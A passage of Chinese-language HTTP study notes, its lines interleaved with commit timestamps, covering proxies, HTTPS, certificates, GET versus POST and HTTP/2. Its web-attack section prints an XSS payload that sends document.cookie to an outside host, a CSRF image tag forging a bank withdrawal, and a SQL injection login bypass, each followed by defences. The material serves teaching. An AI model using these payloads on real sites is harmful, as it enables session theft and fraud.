2018-06-04 14:28:30 +08:00
Content-Disposition: form-data; name="submit-name"
2018-05-08 22:59:42 +08:00
Larry
--AaB03x
2018-06-04 14:28:30 +08:00
Content-Disposition: form-data; name="files"; filename="file1.txt"
Content-Type: text/plain
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
... contents of file1.txt ...
2018-05-08 22:59:42 +08:00
--AaB03x--
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 虚拟主机
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTP/1.1 使用虚拟主机技术,使得一台服务器拥有多个域名,并且在逻辑上可以看成多个服务器。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 通信数据转发
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 代理
2018-04-06 22:46:59 +08:00
代理服务器接受客户端的请求,并且转发给其它服务器。
2018-05-26 22:05:34 +08:00
使用代理的主要目的是:
2018-06-04 14:28:30 +08:00
- 缓存
- 网络访问控制
- 访问日志记录
2018-04-06 22:46:59 +08:00
代理服务器分为正向代理和反向代理两种,用户察觉得到正向代理的存在,而反向代理一般位于内部网络中,用户察觉不到。
2018-06-04 14:28:30 +08:00
<img src="index_files/a314bb79-5b18-4e63-a976-3448bffa6f1b.png" width=""/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/2d09a847-b854-439c-9198-b29c65810944.png" width=""/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 2. 网关
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
与代理服务器不同的是网关服务器会将 HTTP 转化为其它协议进行通信从而请求其它非 HTTP 服务器的服务。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 3. 隧道
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
使用 SSL 等加密手段为客户端和服务器之间建立一条安全的通信线路。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 六、HTTPs
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTP 有以下安全性问题
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 使用明文进行通信,内容可能会被窃听;
- 不验证通信方的身份,通信方的身份有可能遭遇伪装;
- 无法证明报文的完整性,报文有可能遭篡改。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTPs 并不是新协议而是让 HTTP 先和 SSLSecure Sockets Layer通信再由 SSL  TCP 通信。也就是说 HTTPs 使用了隧道进行通信。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
通过使用 SSLHTTPs 具有了加密防窃听、认证防伪装和完整性保护防篡改
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/ssl-offloading.jpg" width="700"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 加密
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 对称密钥加密
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
对称密钥加密Symmetric-Key Encryption加密的加密和解密使用同一密钥。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 优点:运算速度快;
- 缺点:密钥容易被获取。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/7fffa4b8-b36d-471f-ad0c-a88ee763bb76.png" width="600"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 2. 公开密钥加密
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
公开密钥加密Public-Key Encryption也称为非对称密钥加密使用一对密钥用于加密和解密分别为公开密钥和私有密钥。公开密钥所有人都可以获得通信发送方获得接收方的公开密钥之后就可以使用公开密钥进行加密接收方收到通信内容后使用私有密钥解密。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 优点:更为安全;
- 缺点:运算速度慢;
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/39ccb299-ee99-4dd1-b8b4-2f9ec9495cb4.png" width="600"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 3. HTTPs 采用的加密方式
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTPs 采用混合的加密机制使用公开密钥加密用于传输对称密钥来保证安全性之后使用对称密钥加密进行通信来保证效率。下图中的 Session Key 就是对称密钥
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/How-HTTPS-Works.png" width="600"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 认证
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
通过使用 **证书** 来对通信方进行认证。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
数字证书认证机构CACertificate Authority是客户端与服务器双方都可信赖的第三方机构。
2018-05-26 22:56:08 +08:00
2018-06-04 14:28:30 +08:00
服务器的运营人员向 CA 提出公开密钥的申请CA 在判明提出申请者的身份之后会对已申请的公开密钥做数字签名然后分配这个已签名的公开密钥并将该公开密钥放入公开密钥证书后绑定在一起。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
进行 HTTPs 通信时服务器会把证书发送给客户端。客户端取得其中的公开密钥之后先使用数字签名进行验证如果验证通过就可以开始通信了。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/2017-06-11-ca.png" width=""/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 完整性保护
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
SSL 提供报文摘要功能来进行完整性保护。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTP 也提供了 MD5 报文摘要功能但是却不是安全的。例如报文内容被篡改之后同时重新计算 MD5 的值通信接收方是无法意识到发生篡改。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTPs 的报文摘要功能之所以安全是因为它结合了加密和认证这两个操作。试想一下加密之后的报文遭到篡改之后也很难重新计算报文摘要因为无法轻易获取明文。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## HTTPs 的缺点
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 因为需要进行加密解密等过程,因此速度会更慢;
- 需要支付证书授权的高费用。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 配置 HTTPs
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
[Nginx 配置 HTTPS 服务器](https://aotu.io/notes/2016/08/16/nginx-https/index.html)
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 七、Web 攻击技术
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 跨站脚本攻击
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 概念
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
跨站脚本攻击Cross-Site Scripting, XSS可以将代码注入到用户浏览的网页上这种代码包括 HTML  JavaScript。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
例如有一个论坛网站,攻击者可以在上面发布以下内容:
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
<script>location.href="//domain.com/?c=" + document.cookie</script>
2018-04-06 22:46:59 +08:00
```
之后该内容可能会被渲染成以下形式:
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
<p><script>location.href="//domain.com/?c=" + document.cookie</script></p>
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
另一个用户浏览了含有这个内容的页面将会跳转到 domain.com 并携带了当前作用域的 Cookie。如果这个论坛网站通过 Cookie 管理用户登录状态那么攻击者就可以通过这个 Cookie 登录被攻击者的账号了。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 2. 危害
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 窃取用户的 Cookie 
- 伪造虚假的输入表单骗取个人信息
- 显示伪造的文章或者图片
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 3. 防范手段
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
**设置 Cookie  HttpOnly**
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
设置了 HttpOnly  Cookie 可以防止 JavaScript 脚本调用在一定程度上可以防止 XSS 窃取用户的 Cookie 信息。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
**(二)过滤特殊字符**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
许多语言都提供了对 HTML 的过滤
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- PHP  htmlentities() 或是 htmlspecialchars()。
- Python  cgi.escape()。
- Java  xssprotect (Open Source Library)。
- Node.js  node-validator。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
例如 htmlspecialchars() 可以将 `<` 转义为 `&lt;`,将 `>` 转义为 `&gt;`从而避免 HTML  Jascript 代码的运行。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
**(三)富文本编辑器的处理**
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
富文本编辑器允许用户输入 HTML 代码就不能简单地将 `<` 等字符进行过滤了极大地提高了 XSS 攻击的可能性。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
富文本编辑器通常采用 XSS filter 来防范 XSS 攻击可以定义一些标签白名单或者黑名单从而不允许有攻击性的 HTML 代码的输入。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
以下例子中form  script 等标签都被转义 h  p 等标签将会保留。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
[XSS 过滤在线测试](http://jsxss.com/zh/try.html)
2018-05-08 22:59:42 +08:00
```html
2018-06-04 14:28:30 +08:00
<h1 id="title">XSS Demo</h1>
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
<p class="text-center">
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist.
2018-05-08 22:59:42 +08:00
</p>
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
<form>
2018-06-04 14:28:30 +08:00
  <input type="text" name="q" value="test">
  <button id="submit">Submit</button>
2018-05-08 22:59:42 +08:00
</form>
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
<pre>hello</pre>
<p>
2018-06-04 14:28:30 +08:00
  <a href="http://jsxss.com">http</a>
2018-05-08 22:59:42 +08:00
</p>
<h3>Features:</h3>
<ul>
2018-06-04 14:28:30 +08:00
  <li>Specifies HTML tags and their attributes allowed with whitelist</li>
  <li>Handle any tags or attributes using custom function</li>
2018-05-08 22:59:42 +08:00
</ul>
2018-06-04 14:28:30 +08:00
<script type="text/javascript">
2018-05-08 22:59:42 +08:00
alert(/xss/);
</script>
```
```html
2018-06-04 14:28:30 +08:00
<h1>XSS Demo</h1>
2018-05-08 22:59:42 +08:00
<p>
2018-06-04 14:28:30 +08:00
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist.
2018-05-08 22:59:42 +08:00
</p>
&lt;form&gt;
2018-06-04 14:28:30 +08:00
  &lt;input type="text" name="q" value="test"&gt;
  &lt;button id="submit"&gt;Submit&lt;/button&gt;
2018-05-08 22:59:42 +08:00
&lt;/form&gt;
<pre>hello</pre>
<p>
2018-06-04 14:28:30 +08:00
  <a href="http://jsxss.com">http</a>
2018-05-08 22:59:42 +08:00
</p>
<h3>Features:</h3>
<ul>
2018-06-04 14:28:30 +08:00
  <li>Specifies HTML tags and their attributes allowed with whitelist</li>
  <li>Handle any tags or attributes using custom function</li>
2018-05-08 22:59:42 +08:00
</ul>
2018-06-04 14:28:30 +08:00
&lt;script type="text/javascript"&gt;
2018-05-08 22:59:42 +08:00
alert(/xss/);
&lt;/script&gt;
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
## 跨站请求伪造
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 概念
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
跨站请求伪造Cross-site request forgeryCSRF是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作如发邮件发消息甚至财产操作如转账和购买商品。由于浏览器曾经认证过所以被访问的网站会认为是真正的用户操作而去执行。这利用了 Web 中用户身份验证的一个漏洞简单的身份验证只能保证请求发自某个用户的浏览器却不能保证请求本身是用户自愿发出的。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
XSS 利用的是用户对指定网站的信任CSRF 利用的是网站对用户浏览器的信任。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
假如一家银行用以执行转账操作的 URL 地址如下
2018-04-06 22:46:59 +08:00
```
http://www.examplebank.com/withdraw?account=AccoutName&amount=1000&for=PayeeName。
```
那么,一个恶意攻击者可以在另一个网站上放置如下代码:
```
2018-06-04 14:28:30 +08:00
<img src="http://www.examplebank.com/withdraw?account=Alice&amount=1000&for=Badman">
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
如果有账户名为 Alice 的用户访问了恶意站点而她之前刚访问过银行不久登录信息尚未过期那么她就会损失 1000 资金。
2018-04-06 22:46:59 +08:00
这种恶意的网址可以有很多种形式,藏身于网页中的许多地方。此外,攻击者也不需要控制放置恶意网址的网站。例如他可以将这种地址藏在论坛,博客等任何用户生成内容的网站中。这意味着如果服务器端没有合适的防御措施的话,用户即使访问熟悉的可信网站也有受攻击的危险。
2018-06-04 14:28:30 +08:00
透过例子能够看出攻击者并不能通过 CSRF 攻击来直接获取用户的账户控制权也不能直接窃取用户的任何信息。他们能做到的是欺骗用户浏览器让其以用户的名义执行操作。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 2. 防范手段
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
**检查 Referer 字段**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTP 头中有一个 Referer 字段这个字段用于标明请求来源于哪个地址。在处理敏感数据请求时通常来说Referer 字段应和请求的地址位于同一域名下。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
这种办法简单易行工作量低仅需要在关键访问处增加一步校验。但这种办法也有其局限性因其完全依赖浏览器发送正确的 Referer 字段。虽然 HTTP 协议对此字段的内容有明确的规定但并无法保证来访的浏览器的具体实现亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器篡改其 Referer 字段的可能。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
**添加校验 Token**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
由于 CSRF 的本质在于攻击者欺骗用户去访问自己设置的地址所以如果要求在访问敏感数据请求时要求用户浏览器提供不保存在 Cookie 并且攻击者无法伪造的数据作为校验那么攻击者就无法再执行 CSRF 攻击。这种数据通常是表单中的一个数据项。服务器将其生成并附加在表单中其内容是一个伪乱数。当客户端通过表单提交请求时这个伪乱数也一并提交上去以供校验。正常的访问时客户端浏览器能够正确得到并传回这个伪乱数而通过 CSRF 传来的欺骗性攻击中攻击者无从事先得知这个伪乱数的值服务器端就会因为校验 Token 的值为空或者错误拒绝这个可疑请求。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
也可以要求用户输入验证码来进行校验。
2018-06-04 14:28:30 +08:00
## SQL 注入攻击
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 1. 概念
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
服务器上的数据库运行非法的 SQL 语句主要通过拼接来完成。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
### 2. 攻击原理
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
例如一个网站登录验证的 SQL 查询代码为
2018-04-06 22:46:59 +08:00
```sql
2018-06-04 14:28:30 +08:00
strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"
2018-04-06 22:46:59 +08:00
```
如果填入以下内容:
```sql
2018-06-04 14:28:30 +08:00
userName = "1' OR '1'='1";
passWord = "1' OR '1'='1";
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
那么 SQL 查询字符串为
2018-04-06 22:46:59 +08:00
```sql
2018-06-04 14:28:30 +08:00
strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
2018-04-06 22:46:59 +08:00
```
此时无需验证通过就能执行以下查询:
```sql
2018-06-04 14:28:30 +08:00
strSQL = "SELECT * FROM users;"
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
### 3. 防范手段
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
**(一)使用参数化查询**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
以下以 Java 中的 PreparedStatement 为例它是预先编译的 SQL 语句可以传入适当参数并且多次执行。由于没有拼接的过程因此可以防止 SQL 注入的发生。
2018-04-06 22:46:59 +08:00
2018-05-08 22:59:42 +08:00
```java
2018-06-04 14:28:30 +08:00
PreparedStatement stmt = connection.prepareStatement("SELECT * FROM users WHERE userid=? AND password=?");
stmt.setString(1, userid);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();
2018-05-08 22:59:42 +08:00
```
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
**(二)单引号转换**
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
将传入的参数中的单引号转换为连续两个单引号PHP 中的 Magic quote 可以完成这个功能。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 拒绝服务攻击
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
拒绝服务攻击denial-of-service attackDoS亦称洪水攻击其目的在于使目标电脑的网络或系统资源耗尽使服务暂时中断或停止导致其正常用户无法访问。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
分布式拒绝服务攻击distributed denial-of-service attackDDoS指攻击者使用网络上两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> [维基百科:拒绝服务攻击](https://zh.wikipedia.org/wiki/%E9%98%BB%E6%96%B7%E6%9C%8D%E5%8B%99%E6%94%BB%E6%93%8A)
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 八、GET  POST 的区别
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 作用
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
GET 用于获取资源 POST 用于传输实体主体。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 参数
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
GET  POST 的请求都能使用额外的参数但是 GET 的参数是以查询字符串出现在 URL  POST 的参数存储在实体主体中。
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
GET /test/demo_form.asp?name1=value1&name2=value2 HTTP/1.1
2018-04-06 22:46:59 +08:00
```
```
2018-06-04 14:28:30 +08:00
POST /test/demo_form.asp HTTP/1.1
Host: w3schools.com
2018-04-06 22:46:59 +08:00
name1=value1&name2=value2
```
2018-06-04 14:28:30 +08:00
不能因为 POST 参数存储在实体主体中就认为它的安全性更高因为照样可以通过一些抓包工具Fiddler查看。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
因为 URL 只支持 ASCII 因此 GET 的参数中如果存在中文等字符就需要先进行编码例如`中文`会转换为`%E4%B8%AD%E6%96%87`,而空格会转换为`%20`。POST 支持标准字符集。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 安全
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
安全的 HTTP 方法不会改变服务器状态也就是说它只是可读的。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
GET 方法是安全的 POST 却不是因为 POST 的目的是传送实体主体内容这个内容可能是用户上传的表单数据上传成功之后服务器可能把这个数据存储到数据库中因此状态也就发生了改变。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
安全的方法除了 GET 之外还有HEAD、OPTIONS。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
不安全的方法除了 POST 之外还有 PUT、DELETE。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 幂等性
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
幂等的 HTTP 方法同样的请求被执行一次与连续执行多次的效果是一样的服务器的状态也是一样的。换句话说就是幂等方法不应该具有副作用统计用途除外。在正确实现的条件下GETHEADPUT  DELETE 等方法都是幂等的 POST 方法不是。所有的安全方法也都是幂等的。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
GET /pageX HTTP/1.1 是幂等的。连续调用多次,客户端接收到的结果都是一样的:
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
GET /pageX HTTP/1.1
GET /pageX HTTP/1.1
GET /pageX HTTP/1.1
GET /pageX HTTP/1.1
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
POST /add_row HTTP/1.1 不是幂等的。如果调用多次,就会增加多行记录:
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
POST /add_row HTTP/1.1
POST /add_row HTTP/1.1   -> Adds a 2nd row
POST /add_row HTTP/1.1   -> Adds a 3rd row
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
DELETE /idX/delete HTTP/1.1 是幂等的,即便不同的请求接收到的状态码不一样:
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
DELETE /idX/delete HTTP/1.1   -> Returns 200 if idX exists
DELETE /idX/delete HTTP/1.1   -> Returns 404 as it just got deleted
DELETE /idX/delete HTTP/1.1   -> Returns 404
2018-04-06 22:46:59 +08:00
```
2018-06-04 14:28:30 +08:00
## 可缓存
2018-04-06 22:46:59 +08:00
如果要对响应进行缓存,需要满足以下条件:
2018-06-04 14:28:30 +08:00
- 请求报文的 HTTP 方法本身是可缓存的包括 GET  HEAD但是 PUT  DELETE 不可缓存POST 在多数情况下不可缓存的。
- 响应报文的状态码是可缓存的包括200, 203, 204, 206, 300, 301, 404, 405, 410, 414, and 501。
- 响应报文的 Cache-Control 首部字段没有指定不进行缓存。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## XMLHttpRequest
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
为了阐述 POST  GET 的另一个区别需要先了解 XMLHttpRequest
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> XMLHttpRequest 是一个 API它为客户端提供了在客户端和服务器之间传输数据的功能。它提供了一个通过 URL 来获取数据的简单方式并且不会使整个页面刷新。这使得网页只更新一部分页面而不会打扰到用户。XMLHttpRequest  AJAX 中被大量使用。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
在使用 XMLHttpRequest  POST 方法时浏览器会先发送 Header 再发送 Data。但并不是所有浏览器会这么做例如火狐就不会。而 GET 方法 Header  Data 会一起发送。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 九、HTTP/1.0  HTTP/1.1 的区别
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
> 详细内容请见上文
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 默认是长连接
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 支持管线化处理
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 支持同时打开多个 TCP 连接
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 支持虚拟主机
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 新增状态码 100
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 支持分块传输编码
2018-05-31 09:42:14 +08:00
2018-06-04 14:28:30 +08:00
- HTTP/1.1 新增缓存处理指令 max-age
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 十、HTTP/2.0
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## HTTP/1.x 缺陷
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
 HTTP/1.x 实现简单是以牺牲应用性能为代价的
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
- 客户端需要使用多个连接才能实现并发和缩短延迟;
- 不会压缩请求和响应首部,从而导致不必要的网络流量;
- 不支持有效的资源优先级致使底层 TCP 连接的利用率低下。
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
## 二进制分帧层
2018-05-08 22:59:42 +08:00
2018-06-04 14:28:30 +08:00
HTTP/2.0 将报文分成 HEADERS 帧和 DATA 它们都是二进制格式的。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/86e6a91d-a285-447a-9345-c5484b8d0c47.png" width="400"/>
2018-04-14 15:10:47 +08:00
2018-06-04 14:28:30 +08:00
在通信过程中只会有一个 TCP 连接存在它承载了任意数量的双向数据流Stream。一个数据流都有一个唯一标识符和可选的优先级信息用于承载双向信息。消息Message是与逻辑请求或响应消息对应的完整的一系列帧。帧Fram是最小的通信单位来自不同数据流的帧可以交错发送然后再根据每个帧头的数据流标识符重新组装。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/af198da1-2480-4043-b07f-a3b91a88b815.png" width="600"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 服务端推送
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTP/2.0 在客户端请求一个资源时会把相关的资源一起发送给客户端客户端就不需要再次发起请求了。例如客户端请求 page.html 页面服务端就把 script.js  style.css 等与之相关的资源一起发给客户端。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/e3f1657c-80fc-4dfa-9643-bf51abd201c6.png" width="800"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
## 首部压缩
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
HTTP/1.1 的首部带有大量信息而且每次都要重复发送。HTTP/2.0 要求客户端和服务器同时维护和更新一个包含之前见过的首部字段表从而避免了重复传输。不仅如此HTTP/2.0 也使用 Huffman 编码对首部字段进行压缩。
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
<img src="index_files/_u4E0B_u8F7D.png" width="600"/>
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
# 参考资料
2018-04-06 22:46:59 +08:00
2018-06-04 14:28:30 +08:00
- 上野宣. 图解 HTTP[M]. 人民邮电出版社, 2014.
- [MDN : HTTP](https://developer.mozilla.org/en-US/docs/Web/HTTP)
- [HTTP/2 简介](https://developers.google.com/web/fundamentals/performance/http2/?hl=zh-cn)
- [htmlspecialchars](http://php.net/manual/zh/function.htmlspecialchars.php)
- [How to Fix SQL Injection Using Java PreparedStatement & CallableStatement](https://software-security.sans.org/developer-how-to/fix-sql-injection-in-java-using-prepared-callable-statement)
- [浅谈 HTTP  Get  Post 的区别](https://www.cnblogs.com/hyddd/archive/2009/03/31/1426026.html)
- [Are http:// and www really necessary?](https://www.webdancers.com/are-http-and-www-necesary/)
- [HTTP (HyperText Transfer Protocol)](https://www.ntu.edu.sg/home/ehchua/programming/webprogramming/HTTP_Basics.html)
- [Web-VPN: Secure Proxies with SPDY & Chrome](https://www.igvita.com/2011/12/01/web-vpn-secure-proxies-with-spdy-chrome/)
- [File:HTTP persistent connection.svg](http://en.wikipedia.org/wiki/File:HTTP_persistent_connection.svg)
- [Proxy server](https://en.wikipedia.org/wiki/Proxy_server)
- [What Is This HTTPS/SSL Thing And Why Should You Care?](https://www.x-cart.com/blog/what-is-https-and-ssl.html)
- [What is SSL Offloading?](https://securebox.comodo.com/ssl-sniffing/ssl-offloading/)
- [Sun Directory Server Enterprise Edition 7.0 Reference - Key Encryption](https://docs.oracle.com/cd/E19424-01/820-4811/6ng8i26bn/index.html)
- [An Introduction to Mutual SSL Authentication](https://www.codeproject.com/Articles/326574/An-Introduction-to-Mutual-SSL-Authentication)
- [The Difference Between URLs and URIs](https://danielmiessler.com/study/url-uri/)
- [Cookie  Session 的区别](https://juejin.im/entry/5766c29d6be3ff006a31b84e#comment)
- [COOKIE  SESSION 有什么区别](https://www.zhihu.com/question/19786827)
- [Cookie/Session 的机制与安全](https://harttle.land/2015/08/10/cookie-session.html)
- [HTTPS 证书原理](https://shijianan.com/2017/06/11/https/)
- [维基百科:跨站脚本](https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC)
- [维基百科SQL 注入攻击](https://zh.wikipedia.org/wiki/SQL%E8%B3%87%E6%96%99%E9%9A%B1%E7%A2%BC%E6%94%BB%E6%93%8A)
